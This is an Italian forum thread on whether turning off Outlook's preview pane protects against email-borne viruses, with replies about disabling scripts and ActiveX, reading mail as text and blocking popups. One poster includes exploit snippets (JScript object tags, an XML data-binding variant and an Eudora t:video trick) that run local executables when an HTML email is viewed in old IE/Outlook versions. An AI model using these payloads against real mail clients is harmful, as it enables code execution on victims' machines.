anteprima di Outlook

[robywan]

Leggo da parecchie parti che basta l'apertura del messaggio di posta per attivare alcuni tipi di virus, senza neanche aprire allegati.
Leggo anche che basta vedere l'anteprima (mi riferisco ad Outlook), che in pratica equivale all'apertura del messaggio, per attivare gli infami...

Se però disattivo da Visualizza > Layout l'anteprima dei messaggi, sono un briciolo più tutelato?
Mi viene da pensare a questo perchè il messaggio, anche se selezionato, non passa alla visualizzazione "già letto".
OK, non vuol dire niente, si può segnare nuovamente come non letto, però, se non c'è alcuna elaborazione su di esso...

Grazie,
Rw

[piercing]

sicuramente sei MOLTO + tutelato se elimini l'anteprima dei messaggi.
Questo perchè non mandi in esecuzione nulla e non apri l'email a meno che tu non lo voglia esplicitamente fare...
in questa maniera puoi vedere cmq se c'è un mittente che non conosci, o degli allegati sospetti (exe, pif, com, bat e così via...) senza aprire il messaggio e quindi puoi decidere direttamente tu cosa aprire....
io lo levo sempre e comunque.... anche se capisco che l'utilizzo è un pò più pesante... ma reinstallare tutto lo è di più!!

[Triumph Of Steel]

Che io sappia (almeno fino adesso su XP, OE 6 è stato cosi), Outlook ti chiede se vuio "aprire" o "salvare" il file che è stato lanciato facendo l'Anteprima ...
quindi basta annullare...

e basta avere un buon AntiVirus... Sempre!

[BianConiglio]

E' possibile eseguire sia l'allegato che un file presente sul sistema.
Le versioni inferiori alla 6 di IE ( e naturalmente outlook <6) sono vulnerabili a questo e ad altri sistemi...

Per eseguire un file sulla macchina è sufficiente conoscere la locazione specifica dell'eseguibile e scrivere 3 righe di codice nel corpo della mail.

<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/filedaeseguireinlocale.exe"></object>';
</script>

Questo è perl' xml

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>

E' anche possibile sfruttare la stessa idea per eseguire un allegato che venga automaticamente copiato in una cartella default ( es per Eudora )
E' anche possibile combinare questo tipo di exploit con altre vulnerabilità ( tipo quella degli wmv che permettono di aprire pagine htm in locale o in rete che possono contenere codice malizioso )

<style>
a { display:none; }
</style>
<body>
Hello, Eudora.
<xml:namespace prefix="t"/>
<t:video style="display:none;behavior:url(#default#time);" t:src="file://C:/Progra~1/Qualcomm/Eudora/Attach/videochevienelanciatoeapreunapaginahtm.wmv"/>
</body>

Non inserisco altri codici poichè quelli più "brutali" ( esecuzione di codice contenuto all'interno del corpo della mail e via dicendo ) potrebbero essere captati da orecchie lameresche ...per questo me ne sto zitto...

Ricorco che le versioni di Outlook e IE superiori o uguali alla 6 non sono vulnerabili da questi attacchi riportati...ma lo sono da altri che non inserisco..

Altre cazzatine si possono fare in java....soprattutto loop...
Insomma..ci si può sbizzarriere..

Ciauzzz

[piercing]

beh.. non è che cmq in questa maniera sia possibile fare molto...
al massimo un blocco della macchina...
e basta disattivare script e ActiveX nelle email...
finche MS continuerà ad integrare così i suoi ambienti non ci sarà niente da fare.... esisteranno sempre 1000 metodi analoghi...
cmq come sempre nel dubbio basta aprire le email in formato testo... o salvarle come .eml e guardarle con un editor di testo...
ma cmq con l'anteprima attivata tutto questo non lo puoi fare... se non quando è troppo tardi....

[robywan]

...vabbè, farò bene a rinunciare all'anteprima...

Altra cosa: avete presenti quei siti simpatici dove capita di trovare numeri e eseguibili relativi a certe applicazioni di uso frequente...

Capita che uno vi arriva e cominciano ad aprirsi decine e decine di finestre.
Vada per quelle normali che si chiudono normalmente,
vada per quelle a tutto schermo, che comunque si dominano,
ma l'altro giorno ne ho vista una che si chiamava qualcosa tipo "posta in arrivo"..., tra l'altro selezionandola non compariva nulla...
Devo preoccuparmi per la mia rubrica o altro?

Rw

P.S.: newbie, utente junior e senior in base a cosa sono assegnati?

[BianConiglio]

"beh.. non è che cmq in questa maniera sia possibile fare molto... "



Mica troppo....si possono eseguire tutti glie seguibili che vuoi.......

[piercing]

beh... ancora un format pare che non si riesca a fare!!

in genere gli eseguibili presenti sulla macchina non sono pericolosi...

(voglio dire che puoi avviare anche 100000000 volte la calcolatrice o esaurire le risorse di sistema... ma in quanto ad atti pericolosi... insomma....)

è ovvio che se lo unisci a programmini scaricati da file su internet...
a vbs che nascondi in paginette html...
a porte aprete e non monitorate...
a risorse condivise....
e così via... troppe se ne possono fare...

cmq siamo sempre nel campo del tutto è possibile....

io continuo a vedere un computer su 10 che naviga in internet senza la minima protezione con tutti gli HD condivisi senza uno straccio di password...

P.S.: newbie, utente junior e senior in base a cosa sono assegnati?

in funzione di quanti post sono stati inviati

[dado]

Per le decine di finestre che ti si aprono quando vai su siti che distribuiscono serial e crack o simili, una soluzione c'è (se non risolve tutto, almeno limiti decisamente il traffico di popup): è un programmino che si chiama popup killer. Lo trovi un pò ovunque, basta inserire in un motore di ricerca....
Quella finestra che hai detto non si riusciva a chiudere con ALT+F4?

X qt riguarda OE e le email, finchè sono in formato text, anche se hanno 50 virus allegati, non c'è pericolo per la preview. Il problema sono le email in formato HTML, e solo per quelle è utile disattivare la preview.
Dipende dai gusti... se la cosa fa sentire + sicuri, si può anche fare...

[robywan]

ho provato il codicillo che ti apre un'applicazione, come già vidi su alcuni siti.

<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/filedaeseguireinlocale.exe"></object>';
</script>


Che differenza c'è tra mettere il tag object entro un js piuttosto che metterlo direttamente nell'html?

Rw

[Nemok]

.
Capita che uno vi arriva e cominciano ad aprirsi decine e decine di finestre.

Popup killer lo trovi acnhe compreso nel tool di History Killer,presente nella sezione download.

P.S.: newbie, utente junior e senior in base a cosa sono assegnati?

Al numero di messaggi postati,ora non ricordo precisamente le cifre...

[robywan]

Il pop up in questione era ridotto a icona, non cliccabile (neanche a destra), quindi l'ho chiuso con il classico ctrl+alt+canc
Non aveva la solita iconcina a sinistra (normalmente sui pulsanti delle applicazioni aperte c'è un'icona...), come se fosse una finestra di errore o di download.
La dicitura era preoccupante: "posta in arrivo"...

Rg

-------------------------------------
"SOS signore, se l'ex VP ha un tale DNA, non dovremmo tenere l'ACS fuori TV, xchè senza questo ABC avremmo alla gola l'H2O, o peggio il DDT del KGB..."

[piercing]

non ti preoccupare.. è sempre una finestra di explorer opportunamente trattata...
si chiama "chromeless"
va molto in voga ad oggi.... mah... che c'avrà di bello!!